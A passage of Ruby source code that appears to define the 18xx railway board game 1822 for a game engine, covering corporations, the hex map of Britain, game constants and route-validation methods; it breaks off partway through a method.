desc: 'A 50% director’s certificate in the associated minor company. Starting location is F33.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 21. Taff Vale railway',
sym: 'M21',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is E34.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 22. Exeter and Crediton Railway',
sym: 'M22',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is D41.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 23. West Cornwall Railway',
sym: 'M23',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is A42.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 24. The Swansea and Mumbles Railway',
sym: 'M24',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is D35.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
].freeze
# Corporation definitions.
# First the 24 minors (white, numbered 1-24): single 100% certificate,
# always trade at market price, share structure hidden in the UI.
# Then the ten majors. Minor 14 (Metropolitan) has no fixed coordinates —
# it chooses a London city; minors 15/16 and the London majors pin a
# specific city slot on the M38 (London) hex.
CORPORATIONS = [
  {
    sym: '1',
    name: 'Great North of Scotland Railway',
    logo: '1822/1',
    tokens: [0],
    type: 'minor',
    always_market_price: true,
    float_percent: 100,
    hide_shares: true,
    shares: [100],
    max_ownership_percent: 100,
    coordinates: 'H1',
    color: '#ffffff',
    text_color: 'black',
    reservation_color: nil,
  },
  {
    sym: '2',
    name: 'Lanarkshire & Dumbartonshire Railway',
    logo: '1822/2',
    tokens: [0],
    type: 'minor',
    always_market_price: true,
    float_percent: 100,
    hide_shares: true,
    shares: [100],
    max_ownership_percent: 100,
    coordinates: 'E2',
    color: '#ffffff',
    text_color: 'black',
    reservation_color: nil,
  },
  {
    sym: '3',
    name: 'Edinburgh & Dalkeith Railway',
    logo: '1822/3',
    tokens: [0],
    type: 'minor',
    always_market_price: true,
    float_percent: 100,
    hide_shares: true,
    shares: [100],
    max_ownership_percent: 100,
    coordinates: 'H5',
    color: '#ffffff',
    text_color: 'black',
    reservation_color: nil,
  },
  {
    sym: '4',
    name: 'Newcastle & North shields Railway',
    logo: '1822/4',
    tokens: [0],
    type: 'minor',
    always_market_price: true,
    float_percent: 100,
    hide_shares: true,
    shares: [100],
    max_ownership_percent: 100,
    coordinates: 'K10',
    color: '#ffffff',
    text_color: 'black',
    reservation_color: nil,
  },
  {
    sym: '5',
    name: 'Stockton and Darlington Railway',
    logo: '1822/5',
    tokens: [0],
    type: 'minor',
    always_market_price: true,
    float_percent: 100,
    hide_shares: true,
    shares: [100],
    max_ownership_percent: 100,
    coordinates: 'J15',
    color: '#ffffff',
    text_color: 'black',
    reservation_color: nil,
  },
  {
    sym: '6',
    name: 'Furness railway',
    logo: '1822/6',
    tokens: [0],
    type: 'minor',
    always_market_price: true,
    float_percent: 100,
    hide_shares: true,
    shares: [100],
    max_ownership_percent: 100,
    coordinates: 'G16',
    color: '#ffffff',
    text_color: 'black',
    reservation_color: nil,
  },
  {
    sym: '7',
    name: 'Warrington & Newton Railway',
    logo: '1822/7',
    tokens: [0],
    type: 'minor',
    always_market_price: true,
    float_percent: 100,
    hide_shares: true,
    shares: [100],
    max_ownership_percent: 100,
    coordinates: 'H23',
    color: '#ffffff',
    text_color: 'black',
    reservation_color: nil,
  },
  {
    sym: '8',
    name: 'Manchester Sheffield & Lincolnshire Railway',
    logo: '1822/8',
    tokens: [0],
    type: 'minor',
    always_market_price: true,
    float_percent: 100,
    hide_shares: true,
    shares: [100],
    max_ownership_percent: 100,
    coordinates: 'K24',
    color: '#ffffff',
    text_color: 'black',
    reservation_color: nil,
  },
  {
    sym: '9',
    name: 'East Lincolnshire Railway',
    logo: '1822/9',
    tokens: [0],
    type: 'minor',
    always_market_price: true,
    float_percent: 100,
    hide_shares: true,
    shares: [100],
    max_ownership_percent: 100,
    coordinates: 'N23',
    color: '#ffffff',
    text_color: 'black',
    reservation_color: nil,
  },
  {
    sym: '10',
    name: 'Grand Junction Railway',
    logo: '1822/10',
    tokens: [0],
    type: 'minor',
    always_market_price: true,
    float_percent: 100,
    hide_shares: true,
    shares: [100],
    max_ownership_percent: 100,
    coordinates: 'I30',
    color: '#ffffff',
    text_color: 'black',
    reservation_color: nil,
  },
  {
    sym: '11',
    name: 'Great Northern Railway',
    logo: '1822/11',
    tokens: [0],
    type: 'minor',
    always_market_price: true,
    float_percent: 100,
    hide_shares: true,
    shares: [100],
    max_ownership_percent: 100,
    coordinates: 'M30',
    color: '#ffffff',
    text_color: 'black',
    reservation_color: nil,
  },
  {
    sym: '12',
    name: 'Eastern Union Railway',
    logo: '1822/12',
    tokens: [0],
    type: 'minor',
    always_market_price: true,
    float_percent: 100,
    hide_shares: true,
    shares: [100],
    max_ownership_percent: 100,
    coordinates: 'P35',
    color: '#ffffff',
    text_color: 'black',
    reservation_color: nil,
  },
  {
    sym: '13',
    name: 'Headcorn & Maidstone Junction Light Railway',
    logo: '1822/13',
    tokens: [0],
    type: 'minor',
    always_market_price: true,
    float_percent: 100,
    hide_shares: true,
    shares: [100],
    max_ownership_percent: 100,
    coordinates: 'O40',
    color: '#ffffff',
    text_color: 'black',
    reservation_color: nil,
  },
  # Minor 14 has no coordinates: its home token is placed by player choice
  # (London), and its first token costs 20 rather than being free.
  {
    sym: '14',
    name: 'Metropolitan Railway',
    logo: '1822/14',
    tokens: [20],
    type: 'minor',
    always_market_price: true,
    float_percent: 100,
    hide_shares: true,
    shares: [100],
    max_ownership_percent: 100,
    color: '#ffffff',
    text_color: 'black',
    reservation_color: nil,
  },
  {
    sym: '15',
    name: 'London Tilbury & Southend Railway',
    logo: '1822/15',
    tokens: [0],
    type: 'minor',
    always_market_price: true,
    float_percent: 100,
    hide_shares: true,
    shares: [100],
    max_ownership_percent: 100,
    coordinates: 'M38',
    city: 4,
    color: '#ffffff',
    text_color: 'black',
    reservation_color: nil,
  },
  {
    sym: '16',
    name: 'Wycombe Railway',
    logo: '1822/16',
    tokens: [0],
    type: 'minor',
    always_market_price: true,
    float_percent: 100,
    hide_shares: true,
    shares: [100],
    max_ownership_percent: 100,
    coordinates: 'M38',
    city: 2,
    color: '#ffffff',
    text_color: 'black',
    reservation_color: nil,
  },
  {
    sym: '17',
    name: 'London & Southampton Railway',
    logo: '1822/17',
    tokens: [0],
    type: 'minor',
    always_market_price: true,
    float_percent: 100,
    hide_shares: true,
    shares: [100],
    max_ownership_percent: 100,
    coordinates: 'J41',
    color: '#ffffff',
    text_color: 'black',
    reservation_color: nil,
  },
  {
    sym: '18',
    name: 'Somerset & Dorset Joint Railway',
    logo: '1822/18',
    tokens: [0],
    type: 'minor',
    always_market_price: true,
    float_percent: 100,
    hide_shares: true,
    shares: [100],
    max_ownership_percent: 100,
    coordinates: 'I42',
    color: '#ffffff',
    text_color: 'black',
    reservation_color: nil,
  },
  {
    sym: '19',
    name: 'Penarth Harbour & Dock Railway Company',
    logo: '1822/19',
    tokens: [0],
    type: 'minor',
    always_market_price: true,
    float_percent: 100,
    hide_shares: true,
    shares: [100],
    max_ownership_percent: 100,
    coordinates: 'F35',
    color: '#ffffff',
    text_color: 'black',
    reservation_color: nil,
  },
  {
    sym: '20',
    name: 'Monmouthshire Railway & Canal Company',
    logo: '1822/20',
    tokens: [0],
    type: 'minor',
    always_market_price: true,
    float_percent: 100,
    hide_shares: true,
    shares: [100],
    max_ownership_percent: 100,
    coordinates: 'F33',
    color: '#ffffff',
    text_color: 'black',
    reservation_color: nil,
  },
  {
    sym: '21',
    name: 'Taff Vale railway',
    logo: '1822/21',
    tokens: [0],
    type: 'minor',
    always_market_price: true,
    float_percent: 100,
    hide_shares: true,
    shares: [100],
    max_ownership_percent: 100,
    coordinates: 'E34',
    color: '#ffffff',
    text_color: 'black',
    reservation_color: nil,
  },
  {
    sym: '22',
    name: 'Exeter and Crediton Railway',
    logo: '1822/22',
    tokens: [0],
    type: 'minor',
    always_market_price: true,
    float_percent: 100,
    hide_shares: true,
    shares: [100],
    max_ownership_percent: 100,
    coordinates: 'D41',
    color: '#ffffff',
    text_color: 'black',
    reservation_color: nil,
  },
  {
    sym: '23',
    name: 'West Cornwall Railway',
    logo: '1822/23',
    tokens: [0],
    type: 'minor',
    always_market_price: true,
    float_percent: 100,
    hide_shares: true,
    shares: [100],
    max_ownership_percent: 100,
    coordinates: 'A42',
    color: '#ffffff',
    text_color: 'black',
    reservation_color: nil,
  },
  {
    sym: '24',
    name: 'The Swansea and Mumbles Railway',
    logo: '1822/24',
    tokens: [0],
    type: 'minor',
    always_market_price: true,
    float_percent: 100,
    hide_shares: true,
    shares: [100],
    max_ownership_percent: 100,
    coordinates: 'D35',
    color: '#ffffff',
    text_color: 'black',
    reservation_color: nil,
  },
  # --- Majors ---
  # LNWR floats at 10% (concession conversion); all other majors at 20%.
  {
    sym: 'LNWR',
    name: 'London and North West Railway',
    logo: '1822/LNWR',
    tokens: [0, 100],
    type: 'major',
    float_percent: 10,
    shares: [10, 10, 10, 10, 10, 10, 10, 10, 10, 10],
    always_market_price: true,
    coordinates: 'M38',
    city: 3,
    color: '#000',
    reservation_color: nil,
  },
  {
    sym: 'GWR',
    name: 'Great Western Railway',
    logo: '1822/GWR',
    tokens: [0, 100],
    type: 'major',
    float_percent: 20,
    always_market_price: true,
    coordinates: 'M38',
    city: 1,
    color: '#165016',
    reservation_color: nil,
  },
  {
    sym: 'LBSCR',
    name: 'London, Brighton and South Coast Railway',
    logo: '1822/LBSCR',
    tokens: [0, 100],
    type: 'major',
    float_percent: 20,
    always_market_price: true,
    coordinates: 'M38',
    city: 0,
    color: '#cccc00',
    text_color: 'black',
    reservation_color: nil,
  },
  {
    sym: 'SECR',
    name: 'South Eastern & Chatham Railway',
    logo: '1822/SECR',
    tokens: [0, 100],
    type: 'major',
    float_percent: 20,
    always_market_price: true,
    coordinates: 'M38',
    city: 5,
    color: '#ff7f2a',
    reservation_color: nil,
  },
  {
    sym: 'CR',
    name: 'Caledonian Railway',
    logo: '1822/CR',
    tokens: [0, 100],
    type: 'major',
    float_percent: 20,
    always_market_price: true,
    coordinates: 'E6',
    color: '#5555ff',
    reservation_color: nil,
  },
  {
    sym: 'MR',
    name: 'Midland Railway',
    logo: '1822/MR',
    tokens: [0, 100],
    type: 'major',
    float_percent: 20,
    always_market_price: true,
    coordinates: 'J29',
    color: '#ff2a2a',
    reservation_color: nil,
  },
  {
    sym: 'LYR',
    name: 'Lancashire & Yorkshire',
    logo: '1822/LYR',
    tokens: [0, 100],
    type: 'major',
    float_percent: 20,
    always_market_price: true,
    coordinates: 'G22',
    color: '#2d0047',
    reservation_color: nil,
  },
  {
    sym: 'NBR',
    name: 'North British Railway',
    logo: '1822/NBR',
    tokens: [0, 100],
    type: 'major',
    float_percent: 20,
    always_market_price: true,
    coordinates: 'H5',
    color: '#a05a2c',
    reservation_color: nil,
  },
  {
    sym: 'SWR',
    name: 'South Wales Railway',
    logo: '1822/SWR',
    tokens: [0, 100],
    type: 'major',
    float_percent: 20,
    always_market_price: true,
    coordinates: 'H33',
    color: '#999999',
    text_color: 'black',
    reservation_color: nil,
  },
  {
    sym: 'NER',
    name: 'North Eastern Railway',
    logo: '1822/NER',
    tokens: [0, 100],
    type: 'major',
    float_percent: 20,
    always_market_price: true,
    coordinates: 'L19',
    color: '#aade87',
    reservation_color: nil,
  },
].freeze
# Map definition, keyed by starting tile colour. Each value maps a hex id
# (or list of hex ids) to an engine tile-definition string describing its
# preprinted towns/cities, terrain upgrade costs, borders and paths.
HEXES = {
  # Plain (white) hexes — layable by players.
  white: {
    %w[B39 C10 D9 E8 E12 F41 G2 G6 G26 G38 G40 H11 H27 H29 H31 H41 I6 I28 I34 I36 J9 J11 J13 J17 J27 J33
       J35 J37 K8 K16 K18 K22 K26 K32 K34 K40 L15 L17 L23 L25 L27 L29 L31 L35 L41 M18 M20 M24 M32 M34 N19
       N25 N31 N35 N41 O32 O34 P27 P29 P31 P33 Q28 Q32 Q34] =>
      '',
    ['H43'] =>
      'border=edge:4,type:impassable',
    ['D37'] =>
      'border=edge:3,type:impassable;border=edge:4,type:impassable',
    ['N27'] =>
      'border=edge:0,type:impassable;border=edge:5,type:impassable',
    ['E36'] =>
      'border=edge:0,type:impassable;border=edge:1,type:impassable;border=edge:5,type:impassable',
    ['G10'] =>
      'border=edge:0,type:water,cost:40',
    ['O38'] =>
      'border=edge:2,type:water,cost:40;border=edge:3,type:water,cost:40;border=edge:5,type:impassable',
    # Stubs around London (M38) mark the fixed entries into the city hex.
    ['N37'] =>
      'border=edge:0,type:water,cost:40;border=edge:5,type:water,cost:40;stub=edge:1',
    ['L37'] =>
      'stub=edge:5',
    ['L39'] =>
      'stub=edge:4',
    ['M40'] =>
      'stub=edge:3',
    %w[C42 F39 L21 M28] =>
      'upgrade=cost:20,terrain:swamp',
    ['O28'] =>
      'upgrade=cost:20,terrain:swamp;border=edge:1,type:impassable;border=edge:2,type:impassable',
    ['E38'] =>
      'upgrade=cost:20,terrain:swamp;border=edge:3,type:impassable',
    ['H35'] =>
      'upgrade=cost:20,terrain:swamp;border=edge:2,type:water,cost:40',
    ['N39'] =>
      'upgrade=cost:20,terrain:swamp;border=edge:3,type:water,cost:40;stub=edge:2',
    ['F37'] =>
      'upgrade=cost:20,terrain:swamp;border=edge:2,type:impassable;border=edge:3,type:impassable',
    %w[D43 I32 M22] =>
      'upgrade=cost:40,terrain:swamp',
    ['N29'] =>
      'upgrade=cost:40,terrain:swamp;border=edge:3,type:impassable;border=edge:4,type:impassable',
    %w[B41 D39 G14 G30 H39 I12 I24 I38 J39] =>
      'upgrade=cost:40,terrain:hill',
    %w[C40 E10 F9 G8 H7 H9 H15 I8 I10 J7 J23 J25] =>
      'upgrade=cost:60,terrain:hill',
    %w[I14 I16 I18 I20 J19] =>
      'upgrade=cost:80,terrain:mountain',
    %w[C38 D11 E40 F3 F5 G20 G28 G32 G42 H13 H25 I26 J31 K12 K36 M16 M26 N33 O42] =>
      'town=revenue:0',
    %w[H17 P39] =>
      'town=revenue:0;border=edge:2,type:impassable',
    ['H3'] =>
      'town=revenue:0;border=edge:1,type:impassable;border=edge:0,type:water,cost:40',
    ['F11'] =>
      'town=revenue:0;border=edge:5,type:impassable',
    ['O36'] =>
      'town=revenue:0;border=edge:0,type:water,cost:40',
    ['M36'] =>
      'town=revenue:0;stub=edge:0',
    %w[F7 H21] =>
      'town=revenue:0;town=revenue:0',
    ['H37'] =>
      'town=revenue:0;town=revenue:0;upgrade=cost:20,terrain:swamp',
    ['O30'] =>
      'town=revenue:0;upgrade=cost:20,terrain:swamp',
    ['G34'] =>
      'town=revenue:0;upgrade=cost:20,terrain:swamp;border=edge:0,type:water,cost:40;'\
      'border=edge:5,type:water,cost:40',
    ['G24'] =>
      'town=revenue:0;upgrade=cost:40,terrain:swamp',
    ['I40'] =>
      'town=revenue:0;upgrade=cost:40,terrain:hill',
    ['J21'] =>
      'town=revenue:0;upgrade=cost:60,terrain:hill',
    %w[D41 H19 J15 J29 J41 K10 K14 K20 K24 K28 K30 K38 L33 M30 P35 P41] =>
      'city=revenue:0',
    ['I42'] =>
      'city=revenue:0;border=edge:1,type:impassable',
    ['G4'] =>
      'city=revenue:0;border=edge:4,type:impassable',
    ['G16'] =>
      'city=revenue:0;border=edge:5,type:impassable',
    ['G12'] =>
      'city=revenue:0;border=edge:2,type:impassable;border=edge:3,type:water,cost:40',
    # Swansea (S-labelled hex) — uses the special S tile chain.
    ['D35'] =>
      'city=revenue:20,loc:center;town=revenue:10,loc:1;path=a:_0,b:_1;border=edge:0,type:impassable;label=S',
    # London — six separate city slots, one per edge.
    ['M38'] =>
      'city=revenue:20;city=revenue:20;city=revenue:20;city=revenue:20;city=revenue:20;city=revenue:20;'\
      'path=a:0,b:_0;path=a:1,b:_1;path=a:2,b:_2;path=a:3,b:_3;path=a:4,b:_4;path=a:5,b:_5;upgrade=cost:20;'\
      'label=L',
    # T-labelled hexes — use the special T tile chain.
    %w[B43 K42 M42] =>
      'city=revenue:0;label=T',
    %w[L19 Q30] =>
      'city=revenue:0;upgrade=cost:20,terrain:swamp',
    %w[H23 H33] =>
      'city=revenue:0;upgrade=cost:40,terrain:swamp',
    ['O40'] =>
      'city=revenue:0;upgrade=cost:40,terrain:hill',
    ['N21'] =>
      'city=revenue:0;upgrade=cost:20,terrain:swamp;border=edge:0,type:water,cost:40',
    ['N23'] =>
      'city=revenue:0;upgrade=cost:20,terrain:swamp;border=edge:3,type:water,cost:40',
  },
  # Preprinted yellow cities (Cardiff, Leeds, Bristol, Edinburgh, Birmingham,
  # Manchester) and the English Channel.
  yellow: {
    ['F35'] =>
      'city=revenue:30,slots:2;path=a:1,b:_0;path=a:2,b:_0;path=a:4,b:_0;border=edge:0,type:impassable;'\
      'border=edge:5,type:impassable;label=C',
    ['G22'] =>
      'city=revenue:30,slots:2;path=a:0,b:_0;path=a:3,b:_0;path=a:5,b:_0;label=Y',
    ['G36'] =>
      'city=revenue:30,slots:2;path=a:0,b:_0;path=a:4,b:_0;path=a:5,b:_0;border=edge:2,type:impassable;'\
      'border=edge:3,type:water,cost:40;upgrade=cost:20,terrain:swamp;label=Y',
    ['H5'] =>
      'city=revenue:30,slots:2;path=a:1,b:_0;path=a:2,b:_0;path=a:5,b:_0;border=edge:3,type:water,cost:40;'\
      'label=Y',
    ['I22'] =>
      'city=revenue:40,slots:2;path=a:0,b:_0;path=a:1,b:_0;path=a:4,b:_0;upgrade=cost:60,terrain:hill;'\
      'label=BM',
    ['I30'] =>
      'city=revenue:40,slots:2;path=a:0,b:_0;path=a:2,b:_0;path=a:4,b:_0;upgrade=cost:40,terrain:swamp;'\
      'label=BM',
    ['P43'] =>
      'city=revenue:0;upgrade=cost:100;label=EC',
  },
  # Fixed (gray) hexes — preprinted, never upgraded. Includes the Highlands,
  # off-map areas, the double-lane approaches to Birmingham, and France.
  gray: {
    ['A42'] =>
      'city=revenue:yellow_40|green_30|brown_30|gray_40,slots:2,loc:1.5;path=a:4,b:_0,terminal:1;'\
      'path=a:5,b:_0,terminal:1',
    ['C34'] =>
      'city=revenue:yellow_10|green_20|brown_30|gray_40,slots:2;path=a:5,b:_0,terminal:1',
    ['E2'] =>
      'city=revenue:yellow_10|green_10|brown_20|gray_20,slots:2;path=a:0,b:_0,terminal:1;'\
      'path=a:5,b:_0,terminal:1',
    ['E4'] =>
      'path=a:0,b:3',
    ['E6'] =>
      'city=revenue:yellow_40|green_50|brown_60|gray_70,slots:3,loc:1;path=a:0,b:_0;path=a:3,b:_0;'\
      'path=a:4,b:_0;path=a:5,b:_0',
    ['E26'] =>
      'path=a:0,b:4,lanes:2',
    ['E28'] =>
      'city=revenue:yellow_10|green_20|brown_20|gray_30,slots:3;path=a:0,b:_0,lanes:2,terminal:1;'\
      'path=a:3,b:_0,lanes:2,terminal:1;path=a:4,b:_0,lanes:2,terminal:1;path=a:5,b:_0,lanes:2,terminal:1',
    ['E30'] =>
      'path=a:3,b:5,lanes:2',
    ['E32'] =>
      'path=a:0,b:5',
    ['E34'] =>
      'city=revenue:yellow_30|green_40|brown_30|gray_10,slots:2,loc:0;path=a:3,b:_0;'\
      'path=a:4,b:_0,terminal:1;path=a:5,b:_0',
    ['F23'] =>
      'city=revenue:yellow_20|green_20|brown_30|gray_40,slots:2;path=a:5,b:_0,terminal:1',
    %w[F25 F27] =>
      'path=a:1,b:4,a_lane:2.0;path=a:1,b:5,a_lane:2.1',
    %w[F29 F31] =>
      'path=a:2,b:4,a_lane:2.0;path=a:2,b:5,a_lane:2.1',
    ['F33'] =>
      'city=revenue:yellow_20|green_40|brown_30|gray_10,slots:2,loc:4;path=a:1,b:_0;path=a:2,b:_0,terminal:1;'\
      'path=a:5,b:_0',
    ['H1'] =>
      'city=revenue:yellow_30|green_40|brown_50|gray_60,slots:2;path=a:0,b:_0,terminal:1;'\
      'path=a:1,b:_0,terminal:1',
    # France — worthless until green, reached via the English Channel.
    ['Q44'] =>
      'offboard=revenue:yellow_0|green_60|brown_90|gray_120,visit_cost:0;path=a:2,b:_0',
  },
  # Sea (blue) junction hexes — port entry points.
  blue: {
    %w[L11 J43 Q36 Q42 R31] =>
      'junction;path=a:2,b:_0,terminal:1',
    ['F17'] =>
      'junction;path=a:4,b:_0,terminal:1',
    %w[F15 F21] =>
      'junction;path=a:5,b:_0,terminal:1',
  },
}.freeze
LAYOUT = :flat
SELL_MOVEMENT = :down_share
HOME_TOKEN_TIMING = :operate
MUST_BUY_TRAIN = :always
NEXT_SR_PLAYER_ORDER = :most_cash
SELL_AFTER = :operate
SELL_BUY_ORDER = :sell_buy
EVENTS_TEXT = {
'close_concessions' =>
['Concessions close', 'All concessions close without compensation, major companies now float at 50%'],
'full_capitalisation' =>
['Full capitalisation', 'Major companies now receives full capitalisation when floated'],
}.freeze
STATUS_TEXT = Base::STATUS_TEXT.merge(
'can_buy_trains' => ['Buy trains', 'Can buy trains from other corporations'],
'can_convert_concessions' => ['Convert concessions',
'Can float a major company by converting a concession'],
'can_acquire_minor_bidbox' => ['Acquire a minor from bidbox',
'Can acquire a minor from bidbox for £200, must have connection '\
'to start location'],
'can_par' => ['Majors 50% float', 'Majors companies require 50% sold to float'],
'full_capitalisation' => ['Full capitalisation', 'Majors receives full capitalisation '\
'(the remaining five shares are placed in the bank)'],
).freeze
BIDDING_BOX_MINOR_COUNT = 4
BIDDING_BOX_CONCESSION_COUNT = 3
BIDDING_BOX_PRIVATE_COUNT = 3
BIDDING_TOKENS = {
'3': 6,
'4': 5,
'5': 4,
'6': 3,
'7': 3,
}.freeze
BIDDING_TOKENS_PER_ACTION = 3
COMPANY_CONCESSION_PREFIX = 'C'
COMPANY_MINOR_PREFIX = 'M'
COMPANY_PRIVATE_PREFIX = 'P'
DESTINATIONS = {
'LNWR' => 'I22',
'GWR' => 'G36',
'LBSCR' => 'M42',
'SECR' => 'P41',
'CR' => 'G12',
'MR' => 'L19',
'LYR' => 'I22',
'NBR' => 'H1',
'SWR' => 'C34',
'NER' => 'H5',
}.freeze
EXCHANGE_TOKENS = {
'LNWR' => 4,
'GWR' => 3,
'LBSCR' => 3,
'SECR' => 3,
'CR' => 3,
'MR' => 3,
'LYR' => 3,
'NBR' => 3,
'SWR' => 3,
'NER' => 3,
}.freeze
# These trains don't count against train limit, they also don't count as a train
# against the mandatory train ownership. They cant the bought by another corporation.
EXTRA_TRAINS = %w[2P P+ LP].freeze
EXTRA_TRAIN_PULLMAN = 'P+'
EXTRA_TRAIN_PERMANENTS = %w[2P LP].freeze
LIMIT_TOKENS_AFTER_MERGER = 9
CARDIFF_HEX = 'F35'
LONDON_HEX = 'M38'
ENGLISH_CHANNEL_HEX = 'P43'
FRANCE_HEX = 'Q44'
FRANCE_HEX_BROWN_TILE = 'offboard=revenue:yellow_0|green_60|brown_90|gray_120,visit_cost:0;'\
'path=a:2,b:_0,lanes:2'
COMPANY_MTONR = 'P2'
COMPANY_EGR = 'P8'
COMPANY_GSWR = 'P10'
COMPANY_GSWR_DISCOUNT = 40
COMPANY_BER = 'P11'
COMPANY_LSR = 'P12'
MAJOR_TILE_LAYS = [{ lay: true, upgrade: true }, { lay: :not_if_upgraded, upgrade: false }].freeze
MERTHYR_TYDFIL_PONTYPOOL_HEX = 'F33'
MINOR_START_PAR_PRICE = 50
MINOR_BIDBOX_PRICE = 200
MINOR_GREEN_UPGRADE = %w[yellow green].freeze
MINOR_14_ID = '14'
PRIVATE_COMPANIES_ACQUISITION = {
'P1' => { acquire: %i[major], phase: 5 },
'P2' => { acquire: %i[major minor], phase: 2 },
'P3' => { acquire: %i[major], phase: 2 },
'P4' => { acquire: %i[major], phase: 2 },
'P5' => { acquire: %i[major], phase: 3 },
'P6' => { acquire: %i[major], phase: 3 },
'P7' => { acquire: %i[major], phase: 3 },
'P8' => { acquire: %i[major minor], phase: 3 },
'P9' => { acquire: %i[major minor], phase: 3 },
'P10' => { acquire: %i[major minor], phase: 3 },
'P11' => { acquire: %i[major minor], phase: 2 },
'P12' => { acquire: %i[major minor], phase: 3 },
'P13' => { acquire: %i[major minor], phase: 5 },
'P14' => { acquire: %i[major minor], phase: 5 },
'P15' => { acquire: %i[major minor], phase: 2 },
'P16' => { acquire: %i[none], phase: 0 },
'P17' => { acquire: %i[major], phase: 2 },
'P18' => { acquire: %i[major], phase: 5 },
}.freeze
PRIVATE_MAIL_CONTRACTS = %w[P6 P7].freeze
PRIVATE_REMOVE_REVENUE = %w[P5 P6 P7 P8 P10 P17 P18].freeze
PRIVATE_TRAINS = %w[P1 P3 P4 P13 P14].freeze
TOKEN_PRICE = 100
TRACK_PLAIN = %w[7 8 9 80 81 82 83 544 545 546 60 169].freeze
TRACK_TOWN = %w[3 4 58 141 142 143 144 145 146 147 X17].freeze
UPGRADABLE_S_YELLOW_CITY_TILE = '57'
UPGRADABLE_S_YELLOW_ROTATIONS = [2, 5].freeze
UPGRADABLE_S_HEX_NAME = 'D35'
UPGRADABLE_T_YELLOW_CITY_TILES = %w[5 6].freeze
UPGRADABLE_T_HEX_NAMES = %w[B43 K42 M42].freeze
UPGRADE_COST_L_TO_2 = 80
include StubsAreRestricted
attr_accessor :bidding_token_per_player, :player_debts
# Extends the base upgrade list with the special S/T tile chains when building
# the tile manifest, so the UI shows upgrades that only exist on named hexes.
def all_potential_upgrades(tile, tile_manifest: false)
  result = super
  return result unless tile_manifest

  klass = self.class
  result |= [@green_s_tile] if tile.name == klass::UPGRADABLE_S_YELLOW_CITY_TILE
  result |= [@green_t_tile] if klass::UPGRADABLE_T_YELLOW_CITY_TILES.include?(tile.name)
  result |= [@sharp_city, @gentle_city] if klass::UPGRADABLE_T_HEX_NAMES.include?(tile.hex.name)
  result
end
# Bank pool ordering: minors are hidden; majors are listed alphabetically.
def bank_sort(corporations)
  corporations.select { |corp| corp.type != :minor }.sort_by(&:name)
end
# 1822 has no certificate-limit forced sales: any entity may hold above limit.
def can_hold_above_limit?(_entity)
  true
end
# Minors are never parred directly; majors only once the phase allows either
# concession conversion or direct par.
def can_par?(corporation, parrer)
  return false if corporation.type == :minor

  phase_allows = %w[can_convert_concessions can_par].any? { |status| @phase.status.include?(status) }
  return false unless phase_allows

  super
end
# An entity owning an L train can always run (it operates from a token);
# otherwise defer to the base rules.
def can_run_route?(entity)
  return true if entity.trains.any? { |t| t.name == 'L' }

  super
end
# The English Channel and France must be visited together (being tokened out
# of France blocks the EC hex too), and EC+France alone is not a legal route
# since that pair only counts as a single stop.
def check_distance(route, visits)
  ec_visits = english_channel_visit(visits)
  raise GameError, 'Must connect english channel to france' if ec_visits == 1
  raise GameError, 'Route must have at least 2 stops' if ec_visits == 2 && visits.size == 2

  super
end
# Validates that a set of routes does not illegally reuse track, reuse a
# local-train token, or use both Merthyr Tydfil–Pontypool links at once.
# Raises GameError on any violation.
def check_overlap(routes)
  # Tracks by e-train and normal trains: segments are bucketed by train type,
  # so different types may overlap each other but not themselves.
  tracks_by_type = Hash.new { |h, k| h[k] = [] }
  # Check local train not use the same token more then one time
  local_token_hex = []
  # Edges used on the Merthyr Tydfil / Pontypool hex (F33): across all routes
  # only one of the two parallel tracks may be used.
  merthyr_tydfil_pontypool = {}
  routes.each do |route|
    local_token_hex << route.head[:left].hex.id if route.train.local? && !route.connections.empty?
    route.paths.each do |path|
      a = path.a
      b = path.b
      tracks = tracks_by_type[train_type(route.train)]
      # Record each edge the path uses, including its lane, as a usage key.
      tracks << [path.hex, a.num, path.lanes[0][1]] if a.edge?
      tracks << [path.hex, b.num, path.lanes[1][1]] if b.edge?
      # A town with a preferred edge effectively occupies that edge as well,
      # so record the town itself when the path enters from another edge.
      if b.edge? && a.town? && (nedge = a.tile.preferred_city_town_edges[a]) && nedge != b.num
        tracks << [path.hex, a, path.lanes[0][1]]
      end
      if a.edge? && b.town? && (nedge = b.tile.preferred_city_town_edges[b]) && nedge != a.num
        tracks << [path.hex, b, path.lanes[1][1]]
      end
      if path.hex.id == self.class::MERTHYR_TYDFIL_PONTYPOOL_HEX
        merthyr_tydfil_pontypool[a.num] = true if a.edge?
        merthyr_tydfil_pontypool[b.num] = true if b.edge?
      end
    end
  end
  # Any duplicate usage key within a train type is an illegal track reuse.
  tracks_by_type.each do |_type, tracks|
    tracks.group_by(&:itself).each do |k, v|
      raise GameError, "Route can't reuse track on #{k[0].id}" if v.size > 1
    end
  end
  # Each station token may host at most one L (local) train.
  local_token_hex.group_by(&:itself).each do |k, v|
    raise GameError, "Local train can only use the token on #{k[0]} once" if v.size > 1
  end
  # Check Merthyr Tydfil and Pontypool, only one of the 2 tracks may be used
  return unless merthyr_tydfil_pontypool[1] && merthyr_tydfil_pontypool[2]
  raise GameError, 'May only use one of the tracks connecting Merthyr Tydfil and Pontypool'
end
# Triggers on-acquisition effects for the abilities implemented so far
# (train grants and revenue removal).
def company_bought(company, entity)
  id = company.id
  on_acquired_train(company, entity) if self.class::PRIVATE_TRAINS.include?(id)
  # NOTE: the 'aqcuired' spelling matches the callee's definition elsewhere in this file.
  on_aqcuired_remove_revenue(company) if self.class::PRIVATE_REMOVE_REVENUE.include?(id)
end
# Returns "Bid box N" (1-based) when the company currently sits in a minor,
# concession or private bid box; empty string otherwise.
def company_status_str(company)
  [bidbox_minors, bidbox_concessions, bidbox_privates].each do |box|
    position = box.index(company)
    return "Bid box #{position + 1}" if position
  end
  ''
end
# Paths of all other routes run by the same train type (normal vs e-train);
# only same-type routes can conflict with this one.
def compute_other_paths(routes, route)
  type = train_type(route.train)
  routes.flat_map do |other|
